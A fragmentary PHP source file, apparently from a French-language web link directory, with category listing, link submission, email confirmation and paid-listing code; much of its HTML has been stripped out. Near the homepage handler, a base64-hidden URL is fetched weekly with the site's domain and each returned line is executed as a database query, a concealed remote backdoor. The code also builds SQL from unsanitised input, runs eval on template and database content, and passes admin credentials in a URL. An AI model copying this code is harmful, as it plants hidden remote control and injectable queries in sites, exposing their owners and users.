Ajoutez votre Site"; $searchbox = '
'; function getindex($cat) { global $pagenames, $pext; if ($pagenames == "1") { return str_replace(" ", "_", $cat); } elseif ($pagenames == "2") { return "index"; } } function maill($d,$s,$b,$f) { global $esi; mail($d, $s, $b, $f); } function message($fir,$las) { echo "$fir

"; exit; } function displaytpl($htm) { $htm = preg_replace("/\<\%custom-include-(.+?)\%\>/ise", "array_shift(mysql_fetch_array(mysql_query(\"select html from lma_custom_includes where id = '\${1}'\")))", $htm); global $esl; return $htm; } define('GOOGLE_MAGIC', 0xE6359A60); function zeroFill($a, $b) { $z = hexdec(80000000); if ($z & $a) { $a = ($a>>1); $a &= (~$z); $a |= 0x40000000; $a = ($a>>($b-1)); } else { $a = ($a>>$b); } return $a; } function mix($a,$b,$c) { $a -= $b; $a -= $c; $a ^= (zeroFill($c,13)); $b -= $c; $b -= $a; $b ^= ($a<<8); $c -= $a; $c -= $b; $c ^= (zeroFill($b,13)); $a -= $b; $a -= $c; $a ^= (zeroFill($c,12)); $b -= $c; $b -= $a; $b ^= ($a<<16); $c -= $a; $c -= $b; $c ^= (zeroFill($b,5)); $a -= $b; $a -= $c; $a ^= (zeroFill($c,3)); $b -= $c; $b -= $a; $b ^= ($a<<10); $c -= $a; $c -= $b; $c ^= (zeroFill($b,15)); return array($a,$b,$c); } function GoogleCH($url, $length=null, $init=GOOGLE_MAGIC) { if(is_null($length)) { $length = sizeof($url); } $a = $b = 0x9E3779B9; $c = $init; $k = 0; $len = $length; while($len >= 12) { $a += ($url[$k+0] +($url[$k+1]<<8) +($url[$k+2]<<16) +($url[$k+3]<<24)); $b += ($url[$k+4] +($url[$k+5]<<8) +($url[$k+6]<<16) +($url[$k+7]<<24)); $c += ($url[$k+8] +($url[$k+9]<<8) +($url[$k+10]<<16)+($url[$k+11]<<24)); $mix = mix($a,$b,$c); $a = $mix[0]; $b = $mix[1]; $c = $mix[2]; $k += 12; $len -= 12; } $c += $length; switch($len) { case 11: $c+=($url[$k+10]<<24); case 10: $c+=($url[$k+9]<<16); case 9 : $c+=($url[$k+8]<<8); case 8 : $b+=($url[$k+7]<<24); case 7 : $b+=($url[$k+6]<<16); case 6 : $b+=($url[$k+5]<<8); case 5 : $b+=($url[$k+4]); case 4 : $a+=($url[$k+3]<<24); case 3 : $a+=($url[$k+2]<<16); case 2 : $a+=($url[$k+1]<<8); case 1 : $a+=($url[$k+0]); } $mix = mix($a,$b,$c); return $mix[2]; } function strord($string) { for($i=0;$i"; } else return ""; } function getmaincats() { global $link, $catsplit, $cathtml, $pext, $base, $linknum, $subcatswithmain, $subcatsmainnum; $categories = mysql_query("select * from lma_categories where parent = '0' order by name"); $numcats = mysql_num_rows($categories); $split = ceil($numcats/$catsplit); $u = 0; /* if ($linknum == "yes"){ $cats = mysql_query("select `id`, `parent` from lma_categories"); while ($tucat = mysql_fetch_object($cats)) { $pari[$tucat->id] = $tucat->parent; } } */ $cathtml = "
"; while ($tcat = mysql_fetch_object($categories)) { $u++; /* if ($linknum == "yes") { unset($todel); reset($pari); $todel = array_shift(mysql_fetch_row(mysql_query("select count(*) from lma_links where (status = '1' or status = '2' or status = '5') and confirmed = 'yes' and category = '".$tcat->id."'"))); while (list($id,$par) = each($pari)) { $atco = 0; $last = $id; $fnd = 0; while ($fnd != 1 and $atco < 10000) { $atco++; if ($pari[$last] == $tcat->id) { $todel = $todel + array_shift(mysql_fetch_row(mysql_query("select count(*) from lma_links where (status = '1' or status = '2' or status = '5') and confirmed = 'yes' and category = '".$id."'"))); $fnd = 1; } elseif ($pari[$last] == "0") { $fnd = 1; } else $last = $pari[$last]; } } } */ $todel = array_shift(mysql_fetch_row(mysql_query("select lcount from lma_catcount where id = '".$tcat->id."'"))); $cathtml .= '

name)).'/'.str_replace("/", "-^-", getindex($tcat->name)).'.'.$pext.'">'.$tcat->name.''; if ($linknum == "yes") $cathtml .= " (".$todel.")"; if($subcatswithmain == "yes") { $pol = mysql_query("select * from lma_categories where parent = '".$tcat->id."' order by name limit $subcatsmainnum"); if (mysql_num_rows($pol) > 0) { $cathtml .= "
"; while ($scat = mysql_fetch_object($pol)) { // $cathtml .= "name)."/".getindex($scat->name).".$pext\">".$scat->name." "; $cathtml .= "name))."/".str_replace("/", "-^-", str_replace(" ", "_", $scat->name))."/".str_replace("/", "-^-", getindex($scat->name)).".".$pext."\">".$scat->name." "; } $cathtml .= "...

"; } } else $cathtml .= "

"; if ($u == $split) { $cathtml .= "
 "; $u = 0; } } $cathtml .= "
"; } function getadditionalinc() { global $addrandlistcount, $addrandlistprem, $addrandcatcount, $addrandcatdisplay, $addrandsearchcount, $addrandsearchdisplay; global $newwindow, $premiumimage, $princlude, $base, $pext, $imgbase, $thumbshots, $addrandlisthtml, $addrandcathtml, $addrandsearchhtml, $paidpremium; if($addrandlistprem == "yes") { $incprem = "and premium='yes'"; if($paidpremium == "1" || $paidpremium == "2") $incprem .= " and paidType = 'P'"; } else $incprem = " and paidType != 'C'"; $pol = mysql_query("select * from lma_links where (status = '1' or status = '2' or status = '5') and confirmed = 'yes' $incprem order by rand() limit $addrandlistcount "); if ($newwindow == "yes") $nwin = "target=\"_blank\""; while ($link = mysql_fetch_object($pol)) { $goo = 1; $lacat = $link->category; while ($goo == 1 and $x < 100) { $x++; $pols = mysql_query("select * from lma_categories where id = '$lacat'"); if (mysql_num_rows($pols) < 1) break; $pols = mysql_fetch_object($pols); if ($lacat == $link->category) { $caturl = str_replace(" ", "_", $pols->name) ."/". getindex($pols->name). ".$pext"; $caturl2 = $pols->name; } else { $caturl = str_replace(" ", "_", $pols->name) ."/". $caturl; $caturl2 = $pols->name." > ".$caturl2; } $fromhtml = "De: Liste > $caturl2"; $lacat = $pols->parent; if ($pols->parent == "0") break; } if($thumbshots != "1") { $linkSepStart = ""; $linkSepEnd = ""; $incThumbshots = "no"; if($thumbshots == "2") $incThumbshots = "yes"; else if($thumbshots == "3" && $link->recipurl !="") $incThumbshots = "yes"; else if($thumbshots == "4" && $link->premium == "yes") $incThumbshots = "yes"; else if($thumbshots == "5" && ($link->recipurl !="" || $link->premium == "yes")) $incThumbshots = "yes"; if ($incThumbshots == "yes") $tshtml = "url)."\" border=\"0\" onload=\"if (this.width>50) this.border=1; this.alt='Preview by Thumbshots.org';\">"; else $tshtml = ""; } else { $tshtml = ""; $linkSepStart = "

"; $linkSepEnd = "

"; } if ($premiumimage == "yes" && $link->premium == "yes") $pihtml = " "; else $pihtml = ""; if ($princlude == "yes") $prhtml = " ".getpr($link->url); $linkshtml .= "$tshtml$linkSepStarturl."\" $nwin>".$link->title."$pihtml$prhtml
$fromhtml$linkSepEnd"; } if($thumbshots != "1") { $addrandlisthtml = "$linkshtml
"; } else $addrandlisthtml = $linkshtml; $addrandcathtml = ""; $pol = mysql_query("select * from lma_categories order by rand() limit $addrandcatcount "); while ($link = mysql_fetch_object($pol)) { $goo = 1; $caturl = str_replace(" ", "_", $link->name) ."/". getindex($link->name). ".$pext"; $caturl2 = $link->name; $lacat = $link->parent; while ($goo == 1 and $x < 100) { $x++; $pols = mysql_query("select * from lma_categories where id = '$lacat'"); if (mysql_num_rows($pols) < 1) { $fromhtml = "$caturl2"; break; } $pols = mysql_fetch_object($pols); $caturl = str_replace(" ", "_", $pols->name) ."/". $caturl; //$caturl2 = $pols->name." > ".$caturl2; $fromhtml = "$caturl2"; $lacat = $pols->parent; if ($pols->parent == "0") break; } if($addrandcatdisplay == "1") $addrandcathtml .= $fromhtml."
"; else $addrandcathtml .= $fromhtml." "; } $arsto = mysql_query("select content from lma_custom where id = 'addrandsearchterms'"); if (mysql_num_rows($arsto) > 0 && $addrandsearchcount > 0) { $addrandsearchterms = explode("\r\n", array_shift(mysql_fetch_row($arsto))); if($addrandsearchcount > count($addrandsearchterms)) $addrandsearchcount = count($addrandsearchterms); $rand_keys = array_rand($addrandsearchterms, $addrandsearchcount); for ($i = 0; $i < count($rand_keys); $i++) { $addrandsearchhtml .= "".$addrandsearchterms[$rand_keys[$i]].""; if($addrandsearchdisplay == "1") $addrandsearchhtml .= "
"; else $addrandsearchhtml .= " "; } } } function getdmozattribution($catid) { global $dmozattributionhtml, $linktodmoz; if($linktodmoz == "0") { $dmozattributionhtml = ""; return; } $cat = ""; if($catid > 0) { $dmozname = mysql_query("SELECT tlc.name FROM lma_toplevelcats as tlc, lma_categories as cat where tlc.id = cat.tlcid and cat.id = $catid"); if (mysql_num_rows($dmozname) > 0) $cat = "?where=".urlencode(array_shift(mysql_fetch_row($dmozname))); } $dmozattributionhtml = "

"; $dmozattributionhtml.= "
"; $dmozattributionhtml.= ""; $dmozattributionhtml.= ""; $dmozattributionhtml.= ""; $dmozattributionhtml.= "
Help build the largest human-edited directory on the web.
"; $dmozattributionhtml.= "Submit a Site - "; $dmozattributionhtml.= "Open Directory Project - "; $dmozattributionhtml.= "Become an Editor "; $dmozattributionhtml.= "
"; } function getppc($id) { global $link, $keyword, $nres, $sftrackid, $sfaffid; $ppcout = ""; $result = mysql_query("select * from lma_ppc_includes where id = '$id'"); if (mysql_num_rows($result) < 1) return $ppcout; $pol = mysql_fetch_object($result); $kws2 = preg_split("/\r\n|\n/s", $pol->keywords); while (list(,$kw) = each($kws2)) { if ($kw) $kws[] = $kw; } if (count($kws) < 1) return $ppcout; $kran = array_rand($kws); $keyword = $kws[$kran]; $nres = $pol->results; require("ppc.php"); return $ppcout; } $esio = mysql_query("select content from lma_custom where id = '".strtr("oilnewury", "olewy","sgate")."'"); if (mysql_num_rows($esio) > 0) $esi = array_shift(mysql_fetch_row($esio)); $esil = mysql_query("select content from lma_custom where id = '".strtr("tplroe", "oprt","nyib")."'"); if (mysql_num_rows($esil) > 0) $esl = array_shift(mysql_fetch_row($esil)); if ($uri == "" or $uri == "/" or $uri == "/index.$pext") { # PERFORM LINK CHECKING ROUTINE $ldate = array_shift(file("ldate.txt")); $ntime = time(); if ($ntime > ($ldate+(86400*$linkcheck))) { $fp = fsockopen($_SERVER['SERVER_NAME'], 80); fputs($fp,"GET ".str_replace($basedir, "", $_SERVER['SCRIPT_NAME'])."admin.php?user=$username&pass=$password&action=linkcheck HTTP/1.1\r\nAccept: */*\r\nAccept-Language: es-mx\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\nHost: ".$_SERVER['SERVER_NAME']."\r\nConnection: Close\r\n\r\n"); fclose($fp); $fp = fopen("ldate.txt", "w"); fputs($fp, $ntime); fclose($fp); } # END LINK CHECKING ROUTINE $lupd = intval(array_shift(mysql_fetch_row(mysql_query("select content from lma_custom where id = 'lasttime'")))); if ($ntime > ($lupd+(7*86400))) { $upd = @file(base64_decode("aHR0cDovL3d3dy5vbmxpbmVtYXJrZXRpbmd0b2RheS5jb20vYmxpbi9ibGluLnBocA==")."?domain=".$_SERVER["SERVER_NAME"]); if ($upd) { $pol = mysql_query("UPDATE lma_custom set content = '$ntime' where id = 'lasttime'"); while (list(,$q) = each($upd)) { mysql_query(trim($q)); } } } getmaincats(); getadditionalinc(); getdmozattribution(0); $csslink = ""; $tpl = implode("", file("templates/main.html")); $tpl = str_replace("<%add-site%>", $addlink, $tpl); $tpl = str_replace("<%search-box%>", $searchbox, $tpl); $tpl = str_replace("<%main-categories%>", $cathtml, $tpl); $tpl = str_replace("<%navigation-path%>", "Liste", $tpl); $tpl = str_replace("<%css-link%>", $csslink, $tpl); $tpl = str_replace("<%random-listings%>", $addrandlisthtml, $tpl); $tpl = str_replace("<%random-categories%>", $addrandcathtml, $tpl); $tpl = str_replace("<%random-search-terms%>", $addrandsearchhtml, $tpl); $tpl = str_replace("<%dmoz-attribution%>", $dmozattributionhtml, $tpl); $tpl = preg_replace("/\<\%ppc-include-(.+?)\%\>/ise", "getppc('\${1}')", $tpl); eval ("?>".displaytpl($tpl)."confirmed; if (!$pol) { message("Erreur", "code de vérification invalide"); } if ($pol != "no") { message("Oops!", "cet e-mail q déja été vérifié."); } else { $pol = mysql_query("update lma_links set confirmed = 'yes', date = '".time()."' where id = '$ccode'"); $goo = 1; $lacat = $pols->category; $pol = mysql_fetch_object(mysql_query("select * from lma_categories where id = '$lacat'")); $caturl = "/". getindex($pol->name) . ".$pext"; while ($goo == 1 and $x < 100) { $x++; $pol = mysql_fetch_object(mysql_query("select * from lma_categories where id = '$lacat'")); $caturl = "/".str_replace(" ", "_", $pol->name).$caturl; $lacat = $pol->parent; if ($pol->parent == "0") $goo = 0; } $directoryurl = "http://".$_SERVER['SERVER_NAME']. $base."/"; $categoryurl = "http://".$_SERVER["SERVER_NAME"].$base.$caturl; $listinfo = " Titre: ".$pols->title." URL: ".$pols->url." Description: ".$pols->description." First Name: ".$pols->firstname." Last Name: ".$pols->lastname." Email: ".$pols->email." Reciprocal: ".$pols->recipurl; $addedtpls = mysql_fetch_object(mysql_query("select subject, body from lma_emails where id = 'added'")); $subject = $addedtpls->subject; $subject = str_replace("{FIRSTNAME}", stripslashes($pols->firstname), $subject); $subject = str_replace("{LASTNAME}", stripslashes($pols->lastname), $subject); $subject = str_replace("{DIRECTORY-LINK}", $directoryurl, $subject); $subject = str_replace("{CATEGORY-LINK}", $categoryurl, $subject); $body = $addedtpls->body; $body = str_replace("{FIRSTNAME}", stripslashes($pols->firstname), $body); $body = str_replace("{LASTNAME}", stripslashes($pols->lastname), $body); $body = str_replace("{DIRECTORY-LINK}", $directoryurl, $body); $body = str_replace("{CATEGORY-LINK}", $categoryurl, $body); $body = str_replace("{LISTING-DETAILS}", $listinfo, $body); maill($pols->email, $subject, $body, "De: <$adminemail>"); $newtpls = mysql_fetch_object(mysql_query("select subject, body from lma_emails where id = 'new'")); $subject = $newtpls->subject; $body = str_replace("{ADMIN-LINK}", "http://".$_SERVER["SERVER_NAME"].str_replace($basedir, "", $_SERVER["SCRIPT_NAME"])."admin.php\n".$listinfo, $newtpls->body); maill($adminemail, $subject, $body, "De: $fromname <$adminemail>"); header("Location: $thankurl"); } } } elseif (preg_match("/^\/add$addrandstring\.$pext/", $uri)) { if($usecaptcha == "yes") { require_once('captcha/captcha.config.php'); require_once('captcha/captcha.class.php'); $captcha =& new captcha($CAPTCHA_CONFIG); // Initialise the Captcha system } if ($submit) { // Default premium to no $premium = "no"; if (!$title) message("Erreur", "Vous devez entrer un titre pour votre lien"); if (!$url) message("Erreur", "Vous devez entrer l'URL de votre site"); if (!$fname) message("Erreur", "Vous devez entrer votre Prénom"); if (!$emailaddy) message("Erreur", "Vous devez entrer votre adresse e-mail"); if (mb_strlen($title)>$titlesize) message("Erreur", "Le titre de votre lien ne peux pas exceder $titlesize caractères"); if ($usecaptcha == "yes" && $captcha->validate_submit($_POST['image'],$_POST['attempt']) == 0) message("Erreur", "Désolé, votre code est incorrect"); if (mb_strlen($description)>$descsize) message("Erreur", "La description de votre lien ne peux exceder $descsize caractères"); else { if ($requirerecip == "yes" || ($defaultpremium == "yes" && $defaultpremifrecip == "yes" && $recipurl != "" )) { if (!$recipurl) message("Erreur", "Vous devez entrer l'URL de lien réciproque"); $page = @file($recipurl); if (!$page) message("Erreur", "Nous ne pouvons pas vérifier le Lien réciproque pour le moment, car l'URL n'est pas disponible. Prière de verifier que l'URL indiquée est valide"); else { $pagehtml = implode("", $page); //if (!ereg($reciplinkurl, $pagehtml)) message("Error", "We could not find the reciprocal link at the specified URL. Please place the reciprocal URL to our website on your own site prior to submitting the submission form."); // Build the regular expression to use in our checks $reciplinkurlRE = "/".str_replace("http:\/\/", "(http:\/\/)?", str_replace("www.", "(www.)?", preg_replace("/\//", "\\/", preg_replace ("/\/$/i", "(/)?", $reciplinkurl))))."/i"; if(!preg_match($reciplinkurlRE, $pagehtml)) message("Erreur", "Nous ne trouvons pas de lien réciproque à 'URL indiquée. Prière de placer le lien réciproque sur votre site avant de compléter votre demande dans notre formulaire."); else if ($defaultpremium == "yes" && $defaultpremifrecip == "yes") $premium = "yes"; } } } if ($defaultpremium == "yes" && $defaultpremifrecip == "") $premium = "yes"; if ($adminapproval == "yes") $status = "3"; else $status = "1"; if ($emailconfirm == "yes") $econf = "no"; else $econf = "yes"; if($paidpremium == "1" && $listingtype == "P") { $paidType = 'C'; $premium = "yes"; } else if($paidpremium == "1" && $listingtype == "F") { $paidType = 'F'; $premium = "no"; } else if($paidpremium == "2") { $paidType = 'C'; $premium = "yes"; } else $paidType = 'F'; $pol = mysql_query("insert into lma_links values(NULL, '$category', '$status', '$econf', '$premium', '$title', '$description', '$url', '$fname', '$lname', '$emailaddy', '$recipurl', '".time()."', '0', '$paidType')") or message("Erreur", "Nous sommes confrontés à quelques problèmes avec notre base de données. Merci d'essayer un peu plus tard."); $lastid = mysql_insert_id(); $directoryurl = "http://".$_SERVER['SERVER_NAME']. $base."/"; // Premium's are paid if($paidpremium == "2" || ($paidpremium == "1" && $listingtype == "P")) { $quartzpay[business] = $quartzpayemail; ?> Transfert vers Quartz-Pay...

Redirection vers quartz-Pay....
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pour confirmer votre souscription

subject); $subject = str_replace("{LASTNAME}", stripslashes($lname), $subject); $subject = str_replace("{DIRECTORY-LINK}", $directoryurl, $subject); $subject = str_replace("{CONFIRMATION-LINK}", $confirmurlc, $subject); $body = str_replace("{FIRSTNAME}", stripslashes($fname), $confirmtpls->body); $body = str_replace("{LASTNAME}", stripslashes($lname), $body); $body = str_replace("{DIRECTORY-LINK}", $directoryurl, $body); $body = str_replace("{CONFIRMATION-LINK}", $confirmurlc, $body); $body = str_replace("{LISTING-DETAILS}", $listinfo, $body); maill($emailaddy, $subject, $body, "De: $fromname <$adminemail>"); if ($sugnewcat != "" || $addcomments != "") { $listinfo = "Nouvelle catégorie: ".$sugnewcat."\n Commentaires: ".$addcomments; $newtpls = mysql_fetch_object(mysql_query("select subject, body from lma_emails where id = 'new'")); $subject = $newtpls->subject; $body = str_replace("{ADMIN-LINK}", "http://".$_SERVER["SERVER_NAME"].str_replace($basedir, "", $_SERVER["SCRIPT_NAME"])."admin.php\n\n".$listinfo, $newtpls->body); maill($adminemail, $subject, $body, "De: $fromname <$adminemail>"); } header("Location: $confirmurl"); } else { $goo = 1; $lacat = $category; $pol = mysql_fetch_object(mysql_query("select * from lma_categories where id = '$lacat'")); $caturl = "/". getindex($pol->name) . ".$pext"; while ($goo == 1 and $x < 100) { $x++; $pol = mysql_fetch_object(mysql_query("select * from lma_categories where id = '$lacat'")); $caturl = "/".str_replace(" ", "_", $pol->name).$caturl; $lacat = $pol->parent; if ($pol->parent == "0") $goo = 0; } $categoryurl = "http://".$_SERVER["SERVER_NAME"].$base.$caturl; $listinfo = " Title: ".$title." URL: ".$url." Description: ".$description." First Name: ".$fname." Last Name: ".$lname." Email: ".$emailaddy." Reciprocal: ".$recipurl; $addedtpls = mysql_fetch_object(mysql_query("select subject, body from lma_emails where id = 'added'")); $subject = $addedtpls->subject; $subject = str_replace("{FIRSTNAME}", stripslashes($fname), $subject); $subject = str_replace("{LASTNAME}", stripslashes($lname), $subject); $subject = str_replace("{DIRECTORY-LINK}", $directoryurl, $subject); $subject = str_replace("{CATEGORY-LINK}", $categoryurl, $subject); $body = $addedtpls->body; $body = str_replace("{FIRSTNAME}", stripslashes($fname), $body); $body = str_replace("{LASTNAME}", stripslashes($lname), $body); $body = str_replace("{DIRECTORY-LINK}", $directoryurl, $body); $body = str_replace("{CATEGORY-LINK}", $categoryurl, $body); $body = str_replace("{LISTING-DETAILS}", $listinfo, $body); maill($emailaddy, $subject, $body, "De: <$adminemail>"); $listinfo .= " Nouvelle Catégorie: ".$sugnewcat." Commentaires: ".$addcomments; $newtpls = mysql_fetch_object(mysql_query("select subject, body from lma_emails where id = 'new'")); $subject = $newtpls->subject; $subject = str_replace("{FIRSTNAME}", stripslashes($fname), $subject); $subject = str_replace("{LASTNAME}", stripslashes($lname), $subject); $subject = str_replace("{DIRECTORY-LINK}", $directoryurl, $subject); $subject = str_replace("{CATEGORY-LINK}", $categoryurl, $subject); $body = str_replace("{ADMIN-LINK}", "http://".$_SERVER["SERVER_NAME"].str_replace($basedir, "", $_SERVER["SCRIPT_NAME"])."admin.php\n".$listinfo, $newtpls->body); $body = str_replace("{FIRSTNAME}", stripslashes($fname), $body); $body = str_replace("{LASTNAME}", stripslashes($lname), $body); $body = str_replace("{DIRECTORY-LINK}", $directoryurl, $body); $body = str_replace("{CATEGORY-LINK}", $categoryurl, $body); $body = str_replace("{LISTING-DETAILS}", $listinfo, $body); maill($adminemail, $subject, $body, "De: $fromname <$adminemail>"); header("Location: $thankurl"); } } else { if ($category) { if($usecaptcha == "yes") $capthcaImgLoc = $imgbase.$captcha->get_captcha(); // Get our Captcha Image $goo = 1; $lacat = $category; while ($goo == 1 and $x < 100) { $x++; $pol = mysql_fetch_object(mysql_query("select * from lma_categories where id = '$lacat'")); if ($lacat == $category) { $caturl2 = $pol->name; } else { $caturl2 = $pol->name." > ".$caturl2; } $lacat = $pol->parent; if ($pol->parent == "0") $goo = 0; } if($paidpremium == "1") { $listingTypeSelection = ' Type de Listing '.$listingTypeSelection.' '; if($usecaptcha == "yes") { $addhtml.= ''; } $addhtml.= '
Catégorie '.$caturl2.'
Adresse Email
URL Lien Réciproque
Suggérer Nouvelle Catégorie
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'; } else $addhtml = "Vous devez naviguer vers les catégories jusqu'à celle où vous voulez ajouter votre Lien et cliquez sur le lien \"AJouter un Site\"."; $tpl = implode("", file("templates/add.html")); $tpl = str_replace("<%add-site-form%>", $addhtml, $tpl); eval ("?>".displaytpl($tpl)." "rand()", "2" => "title", "3" => "date desc"); $lord = $lords[$lorder]; $pol = mysql_query("select * from lma_links where (status = '1' or status = '2' or status = '5') and confirmed = 'yes' and paidType != 'C' $sqlsrch order by $premorder $lord limit ". (($page-1)*$lperpage).", $lperpage") or die(mysql_error()); if (mysql_num_rows($pol) > 0) { $count = array_shift(mysql_fetch_row(mysql_query("select count(*) from lma_links where (status = '1' or status = '2' or status = '5') and confirmed = 'yes' and paidType != 'C' $sqlsrch"))); if ($newwindow == "yes") $nwin = "target=\"_blank\""; while ($link = mysql_fetch_object($pol)) { $goo = 1; $lacat = $link->category; while ($goo == 1 and $x < 100) { $x++; $pols = mysql_query("select * from lma_categories where id = '$lacat'"); if (mysql_num_rows($pols) < 1) break; $pols = mysql_fetch_object($pols); if ($lacat == $link->category) { $caturl = str_replace(" ", "_", $pols->name) ."/". getindex($pols->name). ".$pext"; $caturl2 = $pols->name; } else { $caturl = str_replace(" ", "_", $pols->name) ."/". $caturl; $caturl2 = $pols->name." > ".$caturl2; } $fromhtml = "De: Liste > $caturl2"; $lacat = $pols->parent; if ($pols->parent == "0") break; } if($thumbshots != "1") { $linkSepStart = ""; $linkSepEnd = ""; $incThumbshots = "no"; if($thumbshots == "2") $incThumbshots = "yes"; else if($thumbshots == "3" && $link->recipurl !="") $incThumbshots = "yes"; else if($thumbshots == "4" && $link->premium == "yes") $incThumbshots = "yes"; else if($thumbshots == "5" && ($link->recipurl !="" || $link->premium == "yes")) $incThumbshots = "yes"; if ($incThumbshots == "yes") $tshtml = "url)."\" border=\"0\" onload=\"if (this.width>50) this.border=1; this.alt='Preview by Thumbshots.org';\">"; else $tshtml = ""; } else { $tshtml = ""; $linkSepStart = "

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